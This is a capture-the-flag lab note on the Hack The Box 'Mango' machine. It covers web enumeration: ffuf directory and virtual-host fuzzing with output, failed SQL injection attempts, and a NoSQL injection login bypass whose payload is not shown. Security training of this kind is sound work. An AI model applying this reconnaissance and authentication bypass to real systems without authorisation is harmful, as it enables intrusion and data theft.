InfoSec LAB

Mango_Web_80

Created: 3 min read

Web

Nmap discovered a Web server on the target port 80 The running service is Apache httpd 2.4.29

403 for both 10.10.10.162 and mango.htb on the port 80

However, there is an active web app on staging-order.mango.htb host It’s a login page to what appears to be an online retailer for mango The Forgot Password button is not functional

Wappalyzer revealed that the web app is written in PHP

Authentication

Authentication sends out a POST request with the credential data

I have tried the basic SQLi authentication bypass, but it did not work

As the target web app appears to be written in PHP, I tried type confusion, which also failed

NoSQLi

This is an authentication bypass technique used for NoSQL. This would only work if the backend DB is MongoDB

It worked. I am being redirected to the /home.php file This confirms that the backend DB is MongoDB

The end result, however, is rather unrewarding as the /home.php file appears to be a static page

The catch, here, is that I might still be able to leverage the discovered vulnerability to exfiltrate user data directly from the backend MongoDB

Fuzzing

┌──(kali㉿kali)-[~/archive/htb/labs/mango]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://staging-order.mango.htb/FUZZ -ic -e .txt,.php
________________________________________________
 :: Method           : GET
 :: URL              : http://staging-order.mango.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
 :: Extensions       : .txt .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
[Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 97ms]
    * FUZZ: home.php
 
[Status: 200, Size: 4022, Words: 447, Lines: 210, Duration: 4047ms]
    * FUZZ: index.php
 
[Status: 301, Size: 335, Words: 20, Lines: 10, Duration: 96ms]
    * FUZZ: vendor
 
[Status: 403, Size: 288, Words: 20, Lines: 10, Duration: 113ms]
    * FUZZ: server-status
 
:: Progress: [3821460/3821460] :: Job [1/1] :: 351 req/sec :: Duration: [2:40:47] :: Errors: 0 ::

Fuzzing the staging-order.mango.htb finds the home.php file, which was the page that I was redirected to after bypassing the authentication

┌──(kali㉿kali)-[~/archive/htb/labs/mango]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://$IP/FUZZ -ic -e .txt,.php
________________________________________________
 :: Method           : GET
 :: URL              : http://10.10.10.162/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
 :: Extensions       : .txt .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
[Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 90ms]
    * FUZZ: server-status
 
:: Progress: [3821460/3821460] :: Job [1/1] :: 391 req/sec :: Duration: [2:40:02] :: Errors: 0 ::
 
 
┌──(kali㉿kali)-[~/archive/htb/labs/mango]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://mango.htb/FUZZ -ic -e .txt,.php
________________________________________________
 :: Method           : GET
 :: URL              : http://mango.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
 :: Extensions       : .txt .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
[Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 96ms]
    * FUZZ: server-status
 
:: Progress: [3821460/3821460] :: Job [1/1] :: 384 req/sec :: Duration: [2:39:40] :: Errors: 0 ::

Nothing

Virtual Host / Sub-domain Discovery

┌──(kali㉿kali)-[~/archive/htb/labs/mango]
└─$ ffuf -c -w /usr/share/wordlists/seclists/discovery/dns/subdomains-top1million-110000.txt -u http://$IP/ -H 'Host: FUZZ.mango.htb' -fc 403
________________________________________________
 :: Method           : GET
 :: URL              : http://10.10.10.162/
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.mango.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response status: 403
________________________________________________
:: Progress: [114441/114441] :: Job [1/1] :: 408 req/sec :: Duration: [0:05:09] :: Errors: 0 ::

Unable to find any additional virtual host

Interactive Graph View

Backlinks